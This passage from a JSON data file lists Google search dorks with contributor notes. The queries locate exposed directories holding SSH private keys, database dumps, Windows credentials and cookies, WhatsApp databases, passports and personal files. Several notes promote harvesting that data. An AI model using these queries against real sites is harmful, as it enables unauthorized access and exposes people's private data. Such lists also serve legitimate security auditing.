folder\ncontaining one or several onenote files(and it obviously helps narrowing\nthe search to what we're looking for)."}, {"dork": "intitle:\"index of\" inurl:\"no-ip.com\"", "description": "# Exploit Title: intitle:\"index of\" inurl:\"no-ip.com\"\n# Google Dork: intitle:\"index of\" inurl:\"no-ip.com\"\n# Date: 17/06/2015\n# Exploit Author: Sphearis\n# Vendor Homepage: NA\n# Software Link: NA\n# Version: NA\n# Tested on: ALL\n# CVE : NA\nThis dork allows you to browse files stored on a personal server(home)\nusing a dynamic dns service to update server IP.\nYou can replace \"no-ip.com\" with any other dynamic dns hosts:\n\"dyndns.org\"\n\"ddns.net\"\n\"dynamic-dns.net\"\n\"dynip.com\"\n\"tzo.com\"\nAnd so on..."}, {"dork": "intitle:index.of.pubs", "description": "Exploit title: intitle:index.of.pubs\nDescription: intitle:index.of.pubs\nSensitive Directories\nAuthor:fidah.org"}, {"dork": "intext:index of sym", "description": "Dork: intext:index of sym\nMost of hacker use auto server symlink script and grab all the config file\nof the server. Most of the script create a folder that name is sym. All\nconfig file stored in this folder.\nThank You\nAtik Rahman"}, {"dork": "inurl:\"/cms/app/webroot\"", "description": "inurl:\"/cms/app/webroot\"\nAuthor:ShockvaWe (mrnoone)\n \u00f6z\u00fcm"}, {"dork": "intitle:\"Index of\" \"WhatsApp Databases\"", "description": "this dork find db.crypt/.db files of whatsapp conversations\nyou can open them with\nhttps://code.google.com/p/hotoloti/downloads/detail?name=Whatsapp_Xtract_V2.1_2012-05-10-2.zip&\nthanks to pmbento\n--acid_burn9X"}, {"dork": "intitle:\"Index.of\" \"attachments\"", "description": "Directories with interesting info.\nHave Fun Responsible.\nDork by Rootkit Pentester."}, {"dork": "inurl:\"default.php\" intext:\"website\" \"has been successfully installed on the server!\"", "description": "Dork= inurl:\"default.php\" intext:\"website\" \"has been successfully installed on the server!\"\nDetails: Here is a list of files and directories in your public_html folder, it bypass directory-listening restriction.\nSilent_z3r0Pakistan Cyber Army"}, {"dork": "private parent intitle:index.of", "description": "http://www.google.com/search?q=private parent intitle:index.of\nDork for all sorts of juicy stuff!\nDecoy"}, {"dork": "inurl:users intitle:index.of", "description": "http://www.google.com/search?q=inurl:users intitle:index.of\nUser folders containing interesting files.\nDecoy"}, {"dork": "inurl:/aspnet_client/system_web/", "description": "Google dork Description: Juice Directory \"ASP\"\nGoogle search: inurl:/aspnet_client/system_web/\nNote:\nJuice Directory. - Yudha[at]glosmon.com"}, {"dork": "\"My Documents\" \"parent\" intitle:index.of", "description": "http://www.google.com/search?q=\"My Documents\" \"parent\" intitle:index.of\n\"My Documents\" folders shared on the interwebs...\nDecoy"}, {"dork": "\"Desktop\" parent intitle:index.of", "description": "http://www.google.com/search?q=\"Desktop\" parent intitle:index.of\nDesktops shared on the interwebs...\nDecoy"}, {"dork": "intitle:index.of parent inurl:repos", "description": "http://www.google.com/search?q=intitle:index.of parent inurl:repos\nShared repositories. Very interesting...\nDecoy"}, {"dork": "inurl:/server/webapps", "description": "Google Search: inurl:/server/webapps\nSubmission Date: 12/19/2015\nDescription: Apache Tomcat information disclosure.\nby @pwns4cash"}, {"dork": "intitle: Index of /awstats/data", "description": "Awstats Log file's directory can reveal file/directory location\nThese logs file may also reveal hosting account usernames,\nas awstats keep track of all files and folders traffic stats you can also\nget a chance to see some secret.txt or secret.php~\nRegards\nDevender Mahto\n@devendermahto"}, {"dork": "inurl:safm.asp ext:asp", "description": "inurl:safm.asp ext:asp\nhttp://atawho.blogspot.com.tr/2016/03/simple-asp-filemanager.html\natawho-sonadam"}, {"dork": "(intext:\"index of /.git\") (\"parent directory\")", "description": "This dork will find git repository's which may have sensitive information.\n(intext:\"index of /.git\") (\"parent directory\")\nEnjoy!\nnecrodamus"}, {"dork": "intitle:Index of /__MACOSX ...", "description": "MAC OS X. Parent Directory Wordpress information.\n-Xploit"}, {"dork": "inurl:/sites/default/files/webform/", "description": "Description: Drupal default web-forms' storage path, usually a lot of files there contains juicy info\nGoogle search: inurl:/sites/default/files/webform/\nDork Author: Serhii Pronin"}, {"dork": "inurl:trash intitle:index.of", "description": "One man's trash is another man's treasure.\ninurl:trash intitle:index.of\nDecoy"}, {"dork": "inurl:pictures intitle:index.of", "description": "inurl:pictures intitle:index.of\nLoads of personal pictures and what not \nSent from trump tower"}, {"dork": "inurl:/FCKeditor/editor/filemanager/upload/", "description": "inurl:/FCKeditor/editor/filemanager/upload/\nLet's you go through unprotected files in the FCKeditor\nwithout authentication."}, {"dork": "index:\"html/js/editor/fckeditor/editor/filemanager/connectors\"", "description": "name =find liferay file page\nGoogle dork Description:\nindex:\"html/js/editor/fckeditor/editor/filemanager/connectors\"\nDate: 2016-10-2\nAuthor: sultan albalawi"}, {"dork": "inurl:\".esy.es/default.php\"", "description": "Dork: inurl:\".esy.es/default.php\"\r\n\r\n\r\n\r\nYou can add \u201cHere is a list of files in your public_html folder\u201d in the dork \u2026\u2026\r\n\r\n\r\n\r\nDork by INILERM"}, {"dork": "Hostinger \u00a9 2016. All rights reserved inurl:default.php", "description": "Google Dork: Hostinger \u00a9 2016. All rights reserved inurl:default.php\nHostinger web hosting clients with default Public page, list of Sensitive Directories and list of files in public_html folder\nGoogle Dork by INILERM\n---\nEl software de antivirus Avast ha analizado este correo electr\u00f3nico en busca de virus.\nhttps://www.avast.com/antivirus"}, {"dork": "inurl:/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php", "description": "Google Dork: inurl:/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php\n\u2022 Refresh \n\u2022 Select All \n\u2022 Delete \n\u2022 Cut \n\u2022 Copy \n\u2022 Paste \n\u2022 New Folder \n\u2022 Upload \u2190 vulnerable exploit in process for upload webshell\n\u2022 Close \n\u2022 Info\nSensitive Directories and Files Containing Juicy Info\nIntext:Index of /fckeditor/editor/plugins/ajaxfilemanager\nGoolge Dork by INILERM"}, {"dork": "\"Powered by AutoIndex PHP Script\" ext:php", "description": "Google Dork: \"Powered by AutoIndex PHP Script\" ext:php\nSensitive Directories and Files Containing Juicy Info\nGoogle Dork by Ini Lerm"}, {"dork": "site:onedrive.live.com shared by", "description": "site:onedrive.live.com shared by\nThis dork identified shared archives in oneDrive.\nIt is important to be logged in to view the documents.\n- Thiago Barros"}, {"dork": "powered by h5ai", "description": "Google Dork: powered by h5ai\n*You can browse through files*\nNEAM :- Helmi"}, {"dork": "\"Index of\" inurl:\"/$Recycle.Bin/\"", "description": "Windows recycle bins might not seem very interesting, but you would be\nsurprised how much juicy info is in there!\nDxtroyer"}, {"dork": "intext:\"Index of /.git\"", "description": "Google Search:inurl: intext:\"Index of /.git\"\r\n\r\nExplanation:Most of the web-applications are maintained using git\r\nrepositories containing important data like\r\ndb-info,logs,configs,main-source code,etc. Many of them are forget to hide\r\nor remove the .git directory from live websites.Its can able to expose of\r\nimportant data.\r\n\r\n\r\nThankYou,\r\n\r\n*Vishnu Prasad P G*"}, {"dork": "intext:\"Index of /database\"", "description": "Explanation: Using this search we can able to get private database details\r\nincluding SQL and other database elements and contents.\r\n\r\n*Jineeb JN*"}, {"dork": "inurl:/sym/root/ intitle:index.of", "description": "Author: Felipe Molina (@felmoltor)\r\n\r\nDescription:\r\n\r\n Probable symbolic links to the root file system of the web server that can\r\nbe browsable. This can be produced by a missconfiguration of the server or\r\nbecause the server has been already compromised by a third party that\r\nwanted to explore the file system of the server easily.\r\n\r\nDork:\r\n inurl:/sym/root/ intitle:index.of"}, {"dork": "intext:/wp-content/plugins/woocommerce/templates/emails/plain/", "description": "When you dork with this,it will generate juciy information in parent\r\ndirectory , for best practice filter according to the country .\r\n\r\n\r\nFu2x2000"}, {"dork": "inurl:/wp-content/plugins/seo-pressor/classes/", "description": "When you dork with this,it will generate juciy information in parent\r\ndirectory , for best practice filter according to the country .\r\n\r\n\r\nFu2x2000"}, {"dork": "intext:\"index of /userfiles/file/\"", "description": "When you dork with this,it will generate juicy information to userfiles ,\r\nfor best practice filter according to the country .\r\n\r\n\r\nRegards\r\n\r\nFu2x2000"}, {"dork": "intitle:index.of .bashrc", "description": "Google Dork Search: *intitle:index.of .bashrc*\r\n\r\n*Explanation: *\r\n\r\nBash allows us to create our own shortcuts through the use of aliases and\r\nshell functions. Aliases can be declared in bash files. These aliases will\r\nlast as long as our shell session is present.\r\n\r\nTo create an alias insert the following command in to .bashrc file\r\n\r\n*alias alias_name=\"command_to_run\"*\r\n\r\nApache server comes with a default offline .bashrc file which can be\r\nexploited further if the alias commands are found.\r\n\r\n*Remediation:*\r\n\r\n1. Disable Directory listing in the server.\r\n2. Remove .bashrc files in the production server or remove the Read / Write\r\npermission of the file through internet.\r\n\r\n*Author: *Melvin Varkey"}, {"dork": "inurl:\"nfs://www.\" \"index of /\"", "description": "This dork return files shared in Network File System (NFS)\r\n\r\nTahani Al-Otaibi"}, {"dork": "intext:\"/wp-content/uploads/wpsc/\"", "description": "When you dork with this,it will generate juicy information, may have\r\nsensitive information in some cases ,\r\n\r\n\r\nRegards\r\n\r\nFu2x2000"}, {"dork": "\"lv_poweredBy\"", "description": "Folders with a lot of shared files!!!.\r\nEnjoy!.\r\n\r\nDork by Rootkit_Pentester."}, {"dork": "inurl:/openwebmail/cgi-bin/openwebmail/etc/", "description": "Dork Author: Tunahan G\u00dcRAL(r00t3rXCrypt0)"}, {"dork": "intext:\"Powered by ViewVC\" | intitle:\"ViewVC Repository Listing\"", "description": "intext:\"Powered by ViewVC\" | intitle:\"ViewVC Repository Listing\"\r\n\r\nViewVC Repository Listing\r\n\r\nManhNho"}, {"dork": "inurl:\"apps/backend/config/\"", "description": "Directories containing Symfony CMS juicy info and files\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:CV+index of", "description": "Able to search and download the CV from web directory.\r\n\r\n\r\nSang Bui"}, {"dork": "intitle:\"Index Of\" intext:\".Trash\"", "description": "Dorks containing trash folders on Linux/Unix machines.\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:index.of home/000~root~000/", "description": "This Dork lists files under Root Directory.\r\n\r\n\r\nAuthor: Parth S. Patel"}, {"dork": "intitle:\"Index.Of.Applications (Parallels)\" -stackoverflow -quora", "description": "Dork will give application folder of parallels virtual machines showing\r\nwhat is installed in the virtual machines\r\n\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:index.of inurl:/websendmail/", "description": "Sites with WebGais - Websendmail.\r\n\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": ":DIR | intitle:index of inurl://whatsapp/", "description": "Unconfirmed Websites leaking Whatsapp Databases.\r\n\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": "index of /node_modules/ -github -stackoverflow", "description": "Find a several of nodejs folders with important files.\r\n\r\nby Franciny Salles(#Bl4kd43m0n)"}, {"dork": "inurl:\"/wp-content/uploads/db-backup\"", "description": "Searching for the backup directory of WP-DB Backup plugin (WordPress).\r\n\r\nSang Bui"}, {"dork": "\"Powered by Apache Subversion version\"", "description": "Looking for the SVN source code folder.\r\n\r\nSang Bui"}, {"dork": "inurl:\"paypal\" intitle:\"index of\" backup | db | access -github", "description": "Some juicy information regarding paypal backups and more.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:revslider inurl:'/revslider+port'", "description": "infos and symlinks to revslider folders upload, plugins and settings,\r\nserver and port.\r\n\r\ngeezazkrays\r\n\r\ni was just searching in google if which port of revslider they use, and\r\nthis were the googledork showed me."}, {"dork": "inurl:\"RootFolder=\" Allitems \"confidential\" | \"classified\" | \"passwords\" | username", "description": "SharePoint directories exposing sensitive information, usernames and\r\nsomtimes passwords\r\n\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:'listprojects.spr'", "description": "Dork show a list of project in Codebeamer directory\r\n\r\nAuthor: Brain Reflow"}, {"dork": "allintext:'HttpFileServer 2.3k'", "description": "Dork about sensitive directory of HFS File Share Server\r\n\r\nallintext:'HttpFileServer 2.3k'\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:\"index of /bins\" arm", "description": "Description: Find servers infected with mirai\r\n\r\nAuthor: edm0nd"}, {"dork": "inurl:/wp-includes/certificates/", "description": "inurl:/wp-includes/certificates/\r\n\r\nFind a lot of certificates from websites"}, {"dork": "intitle:index.of id_rsa -id_rsa.pub", "description": "A simple dork to find SSH private keys indexed by google! Where many of the keys work\r\n\r\nHave Responsibly fun!\r\n__________________________________\r\nSecuritybits.io"}, {"dork": "\"Index of\" \"database.sql\"", "description": "\"Index of\" \"database.sql\"\r\n\r\nThis Google Dork discovers servers with open directories exposing \r\ndatabase files.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "\"index of\" \"database_log\"", "description": "\"index of\" \"database_log\"\r\n\r\nThis Google Dork discovers servers exposing sensitive SQL log data.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "\"index of\" \"database.sql.zip\"", "description": "\"index of\" \"database.sql.zip\"\r\n\r\nThis Google Dork discovers servers with open directories exposing \r\ndatabase backup files.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intitle:backup+index of", "description": "Checking for the public backup folder on the web server, It might include\r\nthe sensitive files or database.\r\n\r\nSang Bui"}, {"dork": "inurl:/typo3/typo3conf", "description": "inurl:/typo3/typo3conf\r\nFind interesting files from TYPO3 CMS installation.\r\n\r\nby Franciny Salles (#Bl4kd43m0n)"}, {"dork": "intext:\"KRAB-DECRYPT.txt\" intitle:\"index of\"", "description": "This a a dork for search sites affected with GrandCrab ransowmare :\r\n\r\n[+] Dork : intext:\"KRAB-DECRYPT.txt\" intitle:\"index of\"\r\n\r\n[+] Linkedin : https://www.linkedin.com/in/mondher-smii/\r\n\r\n[+] Author : SMII Mondher\r\n\r\n[+] Email : smii.mondher@gmail.com"}, {"dork": "intext:pure-ftpd.conf intitle:index of", "description": "intext:pure-ftpd.conf intitle:index of\r\n\r\n\r\nThis Google Dork discovers servers exposing pure-ftpd configuration \r\nfiles.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intext:my.cnf intitle:index of", "description": "intext:my.cnf intitle:index of\r\n\r\nThis Google Dork discovers servers exposing mysql configuration files.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intext:\"paytm\" intitle:\"index of\"", "description": "Discovers PayTm config files and open directories of Sites.\r\n\r\nPayTm Sensitive Directories Expose on Sites\r\n\r\nGoogle Dork :- intext:\u201dpaytm\u201d intitle:\u201dindex of\u201d\r\n\r\nDate:- 15th Oct, 2018\r\n\r\nExploit Author:- Harsh Mukeshbhai Joshi"}, {"dork": "inurl:filebrowser.wcgp?subDir Communigate", "description": "Google Dork Description: Access Public and protected CommunigatePro mail server users' files.\r\nAuthor: Boumediene KADDOUR\r\ndate: 10/25/2018\r\nGoogle Search: inurl:filebrowser.wcgp?subDir Communigate"}, {"dork": "intitle:\"docker\" intitle:\"index of\" config", "description": "*Google Dork:- **intitle:\"docker\" intitle:\"index of\" config*\r\n\r\n*Description :- *\r\n\r\n*Discovers Docker config files and open directories of Sites.*\r\n\r\n*Docker Sensitive Directories Expose on Site**.*\r\n\r\n*Date :- 28th Oct, 2018*\r\n\r\n*Exploit Author :- Aman Bhardwaj *"}, {"dork": "intitle:\" - Revision\" + \"subversion version\"", "description": "Apache subversion directory listing\r\n\r\nManhNho"}, {"dork": "Index of /.svn", "description": "SVN directory\r\n\r\nManhNho"}, {"dork": "intitle:index of /.sql.gz intext:/backup/", "description": "Exploit Title: This Google Dork discover to gathering information of database schema and credentials data of mysql backup\r\nGoogle Dork: intitle:index of /.sql.gz intext:/backup/\r\nDate: 2018-11-10\r\nExploit Author: blackcat"}, {"dork": "inurl:/proc/tty/ index of", "description": "Exploit Title: Using this dork for gathering information by parent directory to discover vulnerable or credential file\r\nGoogle Dork: inurl:/proc/tty/ index of\r\nDate: 2018-11-10\r\nExploit Author: blackcat"}, {"dork": "intitle:\"index of /\" intext:/descargas/", "description": "Google Dork: intitle:\"index of /\" intext:/descargas/\r\n\r\nauthor: @nuria_pp"}, {"dork": "intitle:\"index of /\" intext:/Download/", "description": "Google Dork: intitle:\"index of /\" intext:/Download/\r\n\r\nauthor: @nuria_pp"}, {"dork": "index of kcfinder/", "description": "kcfinder directories\r\n\r\nManhNho"}, {"dork": "index of /ckeditor", "description": "ckeditor directories\r\n\r\nManhNho"}, {"dork": "intitle:\"index of /\" authorized_keys", "description": "Google Dork Description: intitle:\"index of /\" authorized_keys\r\nGoogle Search: intitle:\"index of /\" authorized_keys\r\nAuthor: @nuria_pp\r\nSensitive Directories: authorized_keys ssh and some rsa file"}, {"dork": "inurl:/wp-content/uploads/wp-backup-plus/", "description": "Dork\r\n*inurl:/wp-content/uploads/wp-backup-plus/*"}, {"dork": "intitle:'index of' \"error_log\"", "description": "Find various Wordpress directories containing error logs.\r\n\r\nintitle:'index of' \"error_log\"\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:'index of' \"access_log\"", "description": "Find various Wordpress directories containing access logs.\r\n\r\nintitle:'index of' \"access_log\"\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:\"index of /\" intext:/backup", "description": "Access to different backup files\r\n\r\n\r\nAuthor: Mattias Borg"}, {"dork": "index of /etc/certs/", "description": "certificate directories\r\n\r\nManhNho"}, {"dork": "intitle:\"Index of /private/\"", "description": "Search Private directories also work on Yahoo\r\n\r\nGoogle Dorks: *intitle:\"Index of /private/\"*\r\n\r\nAuthor: Rishabh Sharma (Lazy Hacker)"}, {"dork": "inurl:\"ai1wm-backups\"", "description": "Find WordPress backup files and publicly accessible wp-content directories."}, {"dork": "inurl:\"/irj/go/km/docs/\"", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP files, filesystem information, file structure ++\r\n\r\ninurl:\u201d/irj/go/km/docs/\u201d\r\n- Large amounts of information\r\n- User data\r\n- Sensitive data\r\n- Documents\r\n- File structure of server\r\n- To exploit go to site and click on \u201cNavigation user interface\u201d\r\n- You can download the entire SAP servers directory\r\n- 86.600 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)\r\nSome of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing"}, {"dork": "inurl:\"/irj/go/km/\" intext:navigation", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP files, filesystem information, file structure ++\r\n\r\ninurl:\u201d/irj/go/km/\" intext:navigation\r\n- extract SAP server documents\r\n- Find SAP server\r\n- Find server structure\r\n- Find usernames and passwords\r\n- Find sensitive data\r\n- To exploit go to site and click on \u201cNavigation user interface\u201d\r\n- 1.890 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)"}, {"dork": "inurl:\"/webdynpro/resources/sap.com/\"", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP software components and tools listing ++\r\n\r\ninurl:\u201d/webdynpro/resources/sap.com/\"\r\n- Find software installed on servers\r\n- Version info\r\n- SAP J2EE exploits\r\n- Exploit server software\r\n- Find adminconsole\r\n- Possible SQL Injection:\r\n - https://www.exploit-db.com/exploits/43495\r\n- Create new users\r\n- 1.670 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)"}, {"dork": "intitle:\"Index of /\" inurl:passport", "description": "intitle:\u201dIndex of /\u201c inurl:passport\r\nFind a lot of passports"}, {"dork": "intitle:\"index of /\" ssh", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ All sorts of Websites (a lot of colleges) ++\r\n\r\nintitle:\"index of /\" ssh\r\n\r\nData you find:\r\n - Webserver Version\r\n - SSH Version\r\n - SSH Keys\r\n - SSH Logins\r\n - SSH .exe files\r\n\r\nI found a lot of servers using < SSH 1.4.*\r\nThese are usually +5 years old and full of security holes\r\nA search in Exploit DB for SSH 1. turns up +40.000 exploits for these\r\nsome may work.\r\n\r\n++ 55 500 results at the time of writing ++\r\n\r\n\r\nDISCLAIMER:\r\nThe vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system."}, {"dork": "allintitle:\"Index of /ThinkPHP\" | inurl: \"/ThinkPHP/\"", "description": "Category : Sensitive Directories\r\n\r\nDescription : Dork for finding list of private directories such as library,\r\nlicence, config files and more in ThinkPHP framework used for websites\r\n\r\nDork : allintitle:\"Index of /ThinkPHP\" | inurl: \"/ThinkPHP/\"\r\n\r\nDate : 10/2/2019\r\n\r\nAuthor : Manish Bhandarkar (https://hackingforsecurity.blogspot.com/)"}, {"dork": "allintitle:\"Index of /Admin/Common\" | allintext:\"Parent Directory\"", "description": "Category : Sensitive Directories\r\n\r\n\r\nDescription : Dork for finding access of listed Admin directories which\r\nnormally restricted to normal users. Usually to access those files need an\r\nadmin login.\r\n\r\n\r\nNote : To access more sensitive files locate to parent directory until\r\n/admin or /conf etc.\r\n\r\n\r\nDork : allintitle:\"Index of /Admin/Common\" | allintext:\"Parent Directory\"\r\n\r\n\r\nDate : 10/2/2019\r\n\r\n\r\nAuthor : Manish Bhandarkar\r\n\r\nBlog : https://hackingforsecurity.blogspot.com/"}, {"dork": "allinurl:\"wp-content/plugins/wordpress-popup/views/admin/\"", "description": "Category : Sensitive Directories\r\n\r\n\r\nDescription : Dork for finding private directories inside wordpress-popup\r\nplugin including admin data which are present in Wordpress websites.\r\n\r\n\r\nNote : To access more sensitive files locate to parent directory until\r\n/admin or /conf etc.\r\n\r\n\r\nDork : allinurl:\"wp-content/plugins/wordpress-popup/views/admin/\"\r\n\r\n\r\nAlso Try : allinurl:\"wp-content/plugins/wordpress-popup/\"\r\n\r\n\r\nDate : 10/2/2019\r\n\r\n\r\nAuthor : Manish Bhandarkar\r\n\r\nBlog : https://hackingforsecurity.blogspot.com/"}, {"dork": "\"sasl_passwd\" | smtpd.conf intitle:\"index of\"", "description": "Postfix sensitive files, also passwords\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"/user\" | \"/users\"", "description": "This will show existing users in the system by simply going to the above\r\nmentioned directories.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" inurl:documents backup", "description": "Backup folders containing very juicy info\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"/cgi-bin/CVS/\"", "description": "AUTHOR: FlyingFrog\r\n\r\nTwitter: @ItsKarl0z\r\n\r\n++ Find filed in cgi-bin directories ++\r\n\r\ninurl:\"/cgi-bin/CVS/\""}, {"dork": "inurl:\"/.Trash\" intitle:\"index of\" ~", "description": "Juicy info in some *nix Trash bins.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" $Recycle.bin", "description": "Windows trash bins with a lot of juicy info.\r\n\r\nYou can also get drive letters and folders by attaching :%5C/\r\nbefore $Recycle.bin %5C is \"\\\"\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"/Windows/Recent\" | \"/Windows/History/\"", "description": "This will give you the most recent used files and the history data.\r\nThis is for Vista - Windows 10, it will not work against XP or Windows 2003\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"WindowsCookies\"", "description": "Cookies from Windows users.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"Application Data/Microsoft/Credentials\"", "description": "Credentials in Windows folder\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"Last modified\" intitle:\"index of\" \"dropbox\"", "description": "Dropbox folders\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"description\" & \"size\" intitle:\"index of\" \"owncloud\"", "description": "Owncloud folders\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"/bitcoin/\"", "description": "Exploit : Access the Sensitive Directories using bitcoin directories\r\n\r\nGoogle Dork : intitle:\"index of\" \"/bitcoin/\"\r\n\r\nExploit Author:- Inspira Enterprise Pvt Ltd\r\n\r\nURL :- https://www.inspiraenterprise.com"}, {"dork": "intitle:\"index of\" \".pem\"", "description": "Exploit : Access the .pem (Privacy Enhanced Mail) file\r\n\r\nGoogle Dork : intitle:\"index of\" \".pem\"\r\n\r\nExploit Author:- Inspira Enterprise Pvt Ltd\r\n\r\nURL :- https://www.inspiraenterprise.com"}, {"dork": "intitle:\"index of\" \".dockerignore\"", "description": "Exploit : Access the Sensitive Directories using .dockerignore file\r\n\r\nGoogle Dork : intitle:\"index of\" \".dockerignore\"\r\n\r\nExploit Author:- Inspira Enterprise Pvt Ltd\r\n\r\nURL :- https://www.inspiraenterprise.com"}, {"dork": "intitle:\"index of\" \"/aws.s3/\"", "description": "Exploit : Access the Sensitive Directories of Amazon-Web-Services\r\n\r\nGoogle Dork : intitle:\"index of\" \"/aws.s3/\"\r\n\r\nExploit Author:- Inspira Enterprise Pvt Ltd\r\n\r\nURL :- https://www.inspiraenterprise.com"}, {"dork": "inurl:typo3conf/l10n/", "description": "Interesting directories from typo3 cms exploiting directory listing.\r\n\r\nBy Rayen Messaoudi (PsycoR)"}, {"dork": "inurl:/files/contao", "description": "This dork show some interested pdf files used in contao CMS.\r\n\r\nBy Rayen Messaoudi (PsycoR)"}, {"dork": "inurl:/uploads/wc-logs/", "description": "WooCommerce Classes Paypal Payment Information\r\n\r\ninurl:/uploads/wc-logs/\r\n\r\nDiscovered By: R3VANBASTARD"}, {"dork": "intitle:\"index of\" \"db\"", "description": "Exploit : Access the sensitive directories using \"db\" file.\r\n\r\nGoogle Dork : intitle:\"index of\" \"db\"\r\n\r\nExploit Author:- Jayson Zabate\r\nURL :- https://invalidwebsecurity.info/"}, {"dork": "intitle: \"index of\" \"includes\"", "description": "Exploit : Dorks allow you to access the sensitive directories (includes, wp-includes) using \"includes\" file.\r\nGoogle Dork : intitle: \"index of\" \"includes\"\r\nExploit Author:- Jayson Zabate\r\nURL :- https://invalidwebsecurity.info/"}, {"dork": "intitle: \"index of\" \"./\" \"./bitcoin\"", "description": "Search: BitCoin Directory Listing\r\n\r\nGoogle Dorks: intitle: \"index of\" \"./\" \"./bitcoin\"\r\n\r\nCategory : Sensitive Directories\r\n\r\nExploit Authors:- Om Ahuja\r\nJayesh Thakur\r\nMukul Kulshrestha\r\nHarsh Mukeshbhai Joshi\r\nSagar Shetty\r\n\r\nhttps://www.inspiraenterprise.com/"}, {"dork": "intitle:\"index of\" \".cpanel/caches/config/\"", "description": "Search: Cpanel Caches Config Directory Listing\r\n\r\nGoogle Dorks: intitle:\"index of\" \".cpanel/caches/config/\"\r\n\r\nCategory : Sensitive Directories\r\n\r\nExploit Authors:- Om Ahuja\r\nJayesh Thakur\r\nMukul Kulshrestha\r\nHarsh Mukeshbhai Joshi\r\nSagar Shetty\r\n\r\nhttps://www.inspiraenterprise.com/"}, {"dork": "intitle: \"Index of\" intext:log", "description": "Exploit : File Containing Juicy Info - Dorks allow you to view logs. (e.g.\r\n/log, file/log, ftplogs, server logs)\r\n\r\nGoogle Dork : intitle: \u201cIndex of\u201d intext:log\r\n\r\nExploit Author:- Jayson Zabate\r\nURL :- https://invalidwebsecurity.info/"}, {"dork": "intitle:\"Directory Listing For\" \"Filename\" intext:Tomcat/5.0.28", "description": "Exploit : Dorks allow you to access the sensitive directories of any web\r\napplication using Apache Tomcat/5.0.28.\r\n\r\nGoogle Dork : intitle:\"Directory Listing For\" \"Filename\"\r\nintext:Tomcat/5.0.28\r\n\r\nExploit Author:- Jayson Zabate\r\nURL :- https://invalidwebsecurity.info/"}, {"dork": "allintitle: \"index of/admin\"", "description": "# Google Dork: allintitle: \\\"index of/admin\\\"\r\n# By using this dork it is possible to access some admin login pages\r\nand parent directory structures ,we can access some vulnerable information\r\nlike framework used for the web site technology used for building the\r\nweb site and etc.\r\n\r\n# Date: 04/04/2019\r\n# Author: Ashwin Rajeev"}, {"dork": "type:mil inurl:ftp ext:pdf | ps", "description": "Dork : type:mil inurl:ftp ext:pdf | ps\r\n\r\nDescription : this dork gives you sensitive directories via ftp.\r\n\r\nAuthor : botsec0"}, {"dork": "\"/var/cache/registry/\"", "description": "# Exploit Title:\r\n\r\nCS-Cart admin panel settings information\r\n\r\n# Google Dork:\r\n\r\n\"/var/cache/registry/\"\r\n\r\n# Date: 11, Apr, 2019\r\n# Vendor Homepage:\r\nhttps://www.cs-cart.com/\r\n\r\n# Exploit Author: deadroot"}, {"dork": "intitle:\"index of\" scada", "description": "*Google Dork:- intitle:\"index of\" scada*\r\n\r\n*Description :- 